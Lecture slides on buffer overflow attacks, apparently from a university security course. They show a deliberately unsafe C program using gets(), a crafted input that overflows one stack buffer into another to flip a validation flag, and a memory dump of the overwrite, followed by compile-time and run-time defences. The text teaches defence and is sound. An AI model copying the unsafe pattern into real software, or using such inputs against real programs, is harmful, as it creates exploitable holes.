1. Professor Hossein Saiedian. KU electrical negineering and komputer science.
![Page 74: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/74.jpg)
“A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.”
![Page 75: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/75.jpg)
A very common attack mechanism
from 1988 Morris Worm to Code Red, Slammer, Sasser and many others
Prevention techniques known
Still of major concern due to
legacy of widely deployed buggy
continued careless programming techniques
![Page 76: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/76.jpg)
Caused by programming error
Allows more data to be stored than capacity available in a fixed sized buffer
buffer can be on stack, heap, global data
Overwriting adjacent memory locations
corruption of program data
unexpected transfer of control
memory access violation
execution of code chosen by attacker
![Page 77: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/77.jpg)
int main(int argc, char *argv[]) {
int valid = FALSE;
char str1[8];
char str2[8];
next_tag(str1);
gets(str2);
if (strncmp(str1, str2, 8) == 0)
valid = TRUE;
printf("buffer1: str1(%s), str2(%s),
valid(%d)\n", str1, str2, valid);
}
$ cc -g -o buffer1 buffer1.c$ ./buffer1
START
buffer1: str1(START), str2(START), valid(1)
$ ./buffer1
EVILINPUTVALUE
buffer1: str1(TVALUE),
str2(EVILINPUTVALUE), valid(0)
$ ./buffer1BADINPUTBADINPUT
buffer1: str1(BADINPUT),
str2(BADINPUTBADINPUT), valid(1)
![Page 78: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/78.jpg)
Memory
Address
Before
gets(str2)
After
gets(str2)
Contains
Value of
. . . .
. . . .
. . . .
bffffbf4 34fcffbf
4 . . .
34fcffbf
3 . . .
argv
bffffbf0 01000000
. . . .
01000000
. . . .
argc
bffffbec c6bd0340
. . . @
c6bd0340
. . . @
return
addr
bffffbe8 08fcffbf
. . . .
08fcffbf
. . . .
old base
ptr
bffffbe4 00000000
. . . .
01000000
. . . .
valid
bffffbe0 80640140
. d . @
00640140
. d . @
bffffbdc 54001540
T . . @
4e505554
N P U T
str1[4-7]
bffffbd8 53544152
S T A R
42414449
B A D I
str1[0-3]
bffffbd4 00850408
. . . .
4e505554
N P U T
str2[4-7]
bffffbd0 30561540
0 V . @
42414449
B A D I
str2[0-3]
. . . .
. . . .
. . . .
![Page 79: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/79.jpg)
![Page 80: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/80.jpg)
To exploit a buffer overflow an attacker
must identify a buffer overflow vulnerability in some program
inspection, tracing execution, fuzzing tools
understand how buffer is stored in memory and determine potential for corruption
![Page 81: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/81.jpg)
At machine level all data an array of bytes interpretation depends on instructions used
Modern high-level languages have a strong notion of type and valid operations not vulnerable to buffer overflows
does incur overhead, some limits on use
C and related languages have high-level control structures, but allow direct access to memory hence are vulnerable to buffer overflow
have a large legacy of widely used, unsafe, and hence vulnerable code
![Page 82: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/82.jpg)
Stack frame:
Calling function: needs a data
structure to store the “return”
address and parameters to be
passed
Called function: needs a place
to store its local variables
somewhere different for every call
![Page 83: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/83.jpg)
Occurs when buffer is located on stack
used by Morris Worm
“Smashing the Stack” paper popularized it
Have local variables below saved frame pointer and return address
hence overflow of a local buffer can potentially overwrite these key control items
Attacker overwrites return address with address of desired code
program, system library or loaded in buffer
![Page 84: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/84.jpg)
![Page 85: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/85.jpg)
Buffer overflows are widely exploited
Large amount of vulnerable code in use
despite cause and countermeasures known
Two broad defense approaches
compile-time - harden new programs
run-time - handle attacks on existing programs
![Page 86: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/86.jpg)
Use a modern high-level languages with strong typing
not vulnerable to buffer overflow
compiler enforces range checks and permissible operations on variables
Do have cost in resource use
And restrictions on access to hardware
so still need some code in C like languages
![Page 87: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/87.jpg)
If using potentially unsafe languages eg C
Programmer must explicitly write safe code
by design with new code
extensive after code review of existing code, (e.g., OpenBSD)
Buffer overflow safety a subset of general safe coding techniques
Allow for graceful failure (know how things may go wrong)
check for sufficient space in any buffer
![Page 88: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/88.jpg)
Proposals for safety extensions (library replacements) to C
performance penalties
must compile programs with special compiler
Several safer standard library variants
new functions, e.g. strlcpy()
safer re-implementation of standard functions as a dynamic library, e.g. Libsafe
![Page 89: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/89.jpg)
Stackgaurd: add function entry and exit code to check stack for signs of corruption Use random canary
e.g. Stackguard, Win/GS, GCC
check for overwrite between local variables and saved frame pointer and return address
abort program if change found
issues: recompilation, debugger support
Or save/check safe copy of return address (in a safe, non-corruptible memory area), e.g. Stackshield, RAD
![Page 90: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/90.jpg)
Many BO attacks copy machine code into buffer and xfer ctrl to it
Use virtual memory support to make some regions of memory non-executable (to avoid exec of attacker’s code) e.g. stack, heap, global data
need h/w support in MMU
long existed on SPARC/Solaris systems
recent on x86 Linux/Unix/Windows systems
Issues: support for executable stack code
![Page 91: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/91.jpg)
Manipulate location of key data structures
stack, heap, global data: change address by 1 MB
using random shift for each process
have large address range on modern systems means wasting some has negligible impact
Randomize location of heap buffers and location of standard library functions
![Page 92: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/92.jpg)
Place guard pages between critical regions of memory (or between stack frames)
flagged in MMU (mem mgmt unit) as illegal addresses
any access aborts process
Can even place between stack frames and heap buffers
at execution time and space cost
![Page 93: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/93.jpg)